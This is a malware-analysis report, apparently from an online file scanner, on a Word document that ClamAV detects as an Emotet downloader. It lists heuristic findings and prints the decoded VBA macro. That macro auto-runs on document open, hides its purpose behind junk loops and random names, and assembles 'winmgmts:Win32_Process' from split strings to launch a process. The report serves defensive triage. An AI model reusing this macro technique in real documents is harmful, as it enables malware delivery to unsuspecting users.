MALICIOUS
232
Risk Score
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-7448070-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7448070-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.Matched line in script
Set Fsxhtqbmcttq = CreateObject(Qoqtiqet) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Fsxhtqbmcttq = CreateObject(Qoqtiqet) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8720 bytes |
SHA-256: 4eeb04229e81dfe706c59fc4a82ff604bc40edff259d24b105b2e1e8b800c71c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
151 of 220 identifiers look randomly generated (e.g. 'Cdshzlsivtlne') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Vyvqzuvyv"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Cqwreudpec, 0, 0, MSForms, TextBox"
Private Sub Document_open()
For Nehjkaim = Mplkjouk To 0
For Soignsrc = Syhpjurvr To 0
Ederxwdu = (23 + Round(WOJOkxR3))
Next
Vasjzvavsifhz = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Ivapwytobol = uzH To MZDUoaj1
Qvoibjwxogk = ChrB(dANsZ68a4)
Next
For Ayuvxdscpad = 0 To 0
Zclrvnrle = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
For Psimvmgqagtar = Ihhagvdzy To 0
For Bemxxwsketxji = Bjviscftlbtfd To 0
Tjxzlcecjx = (23 + Round(WOJOkxR3))
Next
Ymlxyriuu = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Wtwkbwdqpit = uzH To MZDUoaj1
Mjxvxhmkkvg = ChrB(dANsZ68a4)
Next
For Duovhrpt = 0 To 0
Ordffhsyf = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
For Prokwsaysy = Ibhsmjrhkgem To 0
For Ngfpxxobrlwbg = Qpzejykjeaxip To 0
Mbryeusdbx = (23 + Round(WOJOkxR3))
Next
Jvwkcnhtr = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Jzdxaozpyb = uzH To MZDUoaj1
Ujizfxlygdrbn = ChrB(dANsZ68a4)
Next
For Uvigshthzbw = 0 To 0
Biifawbauoc = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Kekzylcfmlzal
End Sub
Attribute VB_Name = "Eqgqcukkqs"
Attribute VB_Base = "0{21FB5824-F079-4E17-8E1E-3180FAE51311}{E9A9A18F-FA77-4D29-BE77-0B4E0B3540B2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Bvktkpmcp"
Function Gvrewgkb()
For Febkcapmgqor = Dtmpuwwphqai To 0
For Ppxtqzleg = Vmeesqwxpz To 0
Mxdyqwkkuzhxr = (23 + Round(WOJOkxR3))
Next
Amjymsgyjrko = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Klitrlvn = uzH To MZDUoaj1
Hwjovfhnzvvl = ChrB(dANsZ68a4)
Next
For Jffzthfi = 0 To 0
Jozdahznl = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Fgalqfiwcdkn = Vyvqzuvyv.Cqwreudpec
For Ggfuxnlyp = Istpqcarsxv To 0
For Mvwczlcpvrkxa = Jtmhrmqvbbyoz To 0
Kkmhicqi = (23 + Round(WOJOkxR3))
Next
Pxmbjrql = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Ylnckvaub = uzH To MZDUoaj1
Cdshzlsivtlne = ChrB(dANsZ68a4)
Next
For Dusjhdxeezw = 0 To 0
Mbwhxgmutukgx = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Spucpfsgd = Fgalqfiwcdkn + Eqgqcukkqs.Bznaxyfwp + Eqgqcukkqs.Zkvepwts + Eqgqcukkqs.Rygksenvkbp
For Yeoyziucy = Axzlpxcvtrnh To 0
For Kgepovubccer = Aynkrmowuqi To 0
Rqrlxifocp = (23 + Round(WOJOkxR3))
Next
Kzyuxhxbnv = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Cptfoloh = uzH To MZDUoaj1
Dllrgirayj = ChrB(dANsZ68a4)
Next
For Gmpbxike = 0 To 0
Vnjhpazqafbav = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Cvukvxnunvnbd = Spucpfsgd + Eqgqcukkqs.Ydoehzjxowhl + Eqgqcukkqs.Ejxfdtxi.ControlTipText
For Asddhtgzbw = Cewtwsfwgp To 0
For Tyxclnzjm = Kmkmcrbh To 0
Vkvdqjvasfkgy = (23 + Round(WOJOkxR3))
Next
Vdooxawfbl = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Fdeeifexnc = uzH To MZDUoaj1
Dejuqseobego = ChrB(dANsZ68a4)
Next
For Izzftsjypwoa = 0 To 0
Tmvtftkt = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Gvrewgkb = Eeucouafvnce + Cvukvxnunvnbd + Eeucouafvnce
For Lhgdygaw = Ndlebqrgts To 0
For Qmhxsotndnnd = Spfruwhxjdv To 0
Cfobzftruwanm = (23 + Round(WOJOkxR3))
Next
Gzphmnybbbx = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Tddbaqrhpm = uzH To MZDUoaj1
Yxytfdhttqjnn = ChrB(dANsZ68a4)
Next
For Denzcgjxqs = 0 To 0
Wlfrnbknpz = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
End Function
Function Kekzylcfmlzal()
For Uelqbvidpr = Bohnuerrdblig To 0
For Kmrsdjzje = Jormgnlcull To 0
Fcehstdkgox = (23 + Round(WOJOkxR3))
Next
Yvnbfdpdvdzqu = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Davypamberqlu = uzH To MZDUoaj1
Ztviopps = ChrB(dANsZ68a4)
Next
For Inkzerxugg = 0 To 0
Ycxltikoruws = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Qoqtiqet = "wi" + "nmgmt" + "s:" + "Win3" + "2_" + Vyvqzuvyv.Cqwreudpec + "r" + "oc" + "ess" + I
For Yyvqhuux = Jcnkxdkcnzkf To 0
For Uqoytaebohj = Ikcpjpky To 0
Xazavmtt = (23 + Round(WOJOkxR3))
Next
Gvqgwemphoga = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Crkjbquprpqxt = uzH To MZDUoaj1
Punrjxmtwt = ChrB(dANsZ68a4)
Next
For Vrpuwfax = 0 To 0
Kscyrebp = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Set Fsxhtqbmcttq = CreateObject(Qoqtiqet)
For Tzzpzaknfmmoe = Ulctsbzagyt To 0
For Uvloitsbfty = Jcsuhxtueur To 0
Vuysqgits = (23 + Round(WOJOkxR3))
Next
Xfklnpse = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Sximrvyw = uzH To MZDUoaj1
Tacyycmc = ChrB(dANsZ68a4)
Next
For Xqrqxbniho = 0 To 0
Ofcwqgzlkxc = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Tcombooa = Qoqtiqet + Eqgqcukkqs.Dftrfqydwcc.ControlTipText + Eqgqcukkqs.Ebmbegep.ControlTipText
For Kfkvvknpubh = Vgpsnizrbt To 0
For Ltqbrzzrmcxzk = Kfqgejcc To 0
Yrmsxilvvjqwn = (23 + Round(WOJOkxR3))
Next
Ibztjpit = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Llmlpjqocsh = uzH To MZDUoaj1
Otleokkornevi = ChrB(dANsZ68a4)
Next
For Skqyfdmxyj = 0 To 0
Ailkuvcl = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Dotvjnsq = Tcombooa + Vyvqzuvyv.Cqwreudpec
For Znzjhjjnrwif = Exgwnbfsopzf To 0
For Zhucbcycaep = Qacidtcwnk To 0
Lngykjbtv = (23 + Round(WOJOkxR3))
Next
Bgdbucxbgw = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Rmgvlmrmxax = uzH To MZDUoaj1
Rdpvnwncqac = ChrB(dANsZ68a4)
Next
For Iupjnitzpmeo = 0 To 0
Ecmbinmcz = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Set Kekzylcfmlzal = CreateObject(Dotvjnsq)
For Jbvhenmdz = Asmqjhdgrlxl To 0
For Nqlktvurpejn = Nchripbveveu To 0
Cvlpnnrwatgd = (23 + Round(WOJOkxR3))
Next
Dhgwajspeg = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Srlqfzlyptst = uzH To MZDUoaj1
Crbolfqsswoi = ChrB(dANsZ68a4)
Next
For Cmrflvuz = 0 To 0
Ngratjpmxh = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Kekzylcfmlzal.XSize = False
For Ljcfwseoh = Tcgtjoieho To 0
For Ezjhcdjqdn = Qobdtpdm To 0
Isflswzgwtb = (23 + Round(WOJOkxR3))
Next
Gnlblyiigyfdv = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Krkyfqqqc = uzH To MZDUoaj1
Mrxqkzrquq = ChrB(dANsZ68a4)
Next
For Snwfbuzhwju = 0 To 0
Icuhqwika = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Kekzylcfmlzal.YSize = False
For Leklcstdgt = Htkfuelqzq To 0
For Gzkwkoxccs = Eklbjxtoq To 0
Wyjcgerlutbf = (23 + Round(WOJOkxR3))
Next
Xssvjgosf = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Skhcxwszen = uzH To MZDUoaj1
Lrxlggkd = ChrB(dANsZ68a4)
Next
For Tmeashbget = 0 To 0
Nukjxxigxuzr = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Do While Fsxhtqbmcttq.Create(Null & Gvrewgkb, Didilyscvz, Kekzylcfmlzal)
Loop
For Njsyqmnrmg = Moopkigmgzx To 0
For Rytovjbjh = Pepmdrzwbcem To 0
Vwtmfnlnrzn = (23 + Round(WOJOkxR3))
Next
Rwlefrua = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Tjoaacemmrya = uzH To MZDUoaj1
Wcjibnqyj = ChrB(dANsZ68a4)
Next
For Aqxzuiqpd = 0 To 0
Qnlkmmac = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.